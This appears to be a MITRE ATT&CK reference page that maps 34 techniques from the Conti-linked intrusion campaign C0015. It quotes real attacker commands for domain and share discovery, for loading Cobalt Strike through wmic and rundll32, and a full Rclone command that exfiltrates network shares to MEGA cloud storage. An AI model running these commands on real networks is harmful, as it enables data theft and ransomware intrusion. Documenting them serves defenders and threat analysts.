ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

Campaign: C0015×

34 examples

TechniqueUsed byProcedure example
T1005
Data from Local System
CampaignC0015

During C0015, the threat actors obtained files and data from the compromised network.

T1016
System Network Configuration Discovery
CampaignC0015

During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.

T1018
Remote System Discovery
CampaignC0015

During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.

T1021.001
Remote Desktop Protocol
CampaignC0015

During C0015, the threat actors used RDP to access specific network hosts of interest.

T1027
Obfuscated Files or Information
CampaignC0015

During C0015, the threat actors used Base64-encoded strings.

T1030
Data Transfer Size Limits
CampaignC0015

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.

T1036
Masquerading
CampaignC0015

During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.

T1039
Data from Network Shared Drive
CampaignC0015

During C0015, the threat actors collected files from network shared drives prior to network encryption.

T1047
Windows Management Instrumentation
CampaignC0015

During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.

T1055.001
Dynamic-link Library Injection
CampaignC0015

During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.

T1057
Process Discovery
CampaignC0015

During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.

T1059.003
Windows Command Shell
CampaignC0015

During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.

T1059.005
Visual Basic
CampaignC0015

During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.

T1059.007
JavaScript
CampaignC0015

During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.

T1069.001
Local Groups
CampaignC0015

During C0015, the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.

T1069.002
Domain Groups
CampaignC0015

During C0015, the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.

T1074.001
Local Data Staging
CampaignC0015

During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.

T1083
File and Directory Discovery
CampaignC0015

During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.

T1105
Ingress Tool Transfer
CampaignC0015

During C0015, the threat actors downloaded additional tools and files onto a compromised network.

T1124
System Time Discovery
CampaignC0015

During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.

T1135
Network Share Discovery
CampaignC0015

During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.

T1204.002
Malicious File
CampaignC0015

During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.

T1218.005
Mshta
CampaignC0015

During C0015, the threat actors used `mshta` to execute DLLs.

T1218.010
Regsvr32
CampaignC0015

During C0015, the threat actors employed code that used `regsvr32` for execution.

T1218.011
Rundll32
CampaignC0015

During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.

T1219.002
Remote Desktop Software
CampaignC0015

During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.

T1482
Domain Trust Discovery
CampaignC0015

During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.

T1486
Data Encrypted for Impact
CampaignC0015

During C0015, the threat actors used Conti ransomware to encrypt a compromised network.

T1553.002
Code Signing
CampaignC0015

For C0015, the threat actors used DLL files that had invalid certificates.

T1566.001
Spearphishing Attachment
CampaignC0015

For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.

T1567.002
Exfiltration to Cloud Storage
CampaignC0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.

T1570
Lateral Tool Transfer
CampaignC0015

During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.

T1588.001
Malware
CampaignC0015

For C0015, the threat actors used Cobalt Strike and Conti ransomware.

T1588.002
Tool
CampaignC0015

For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.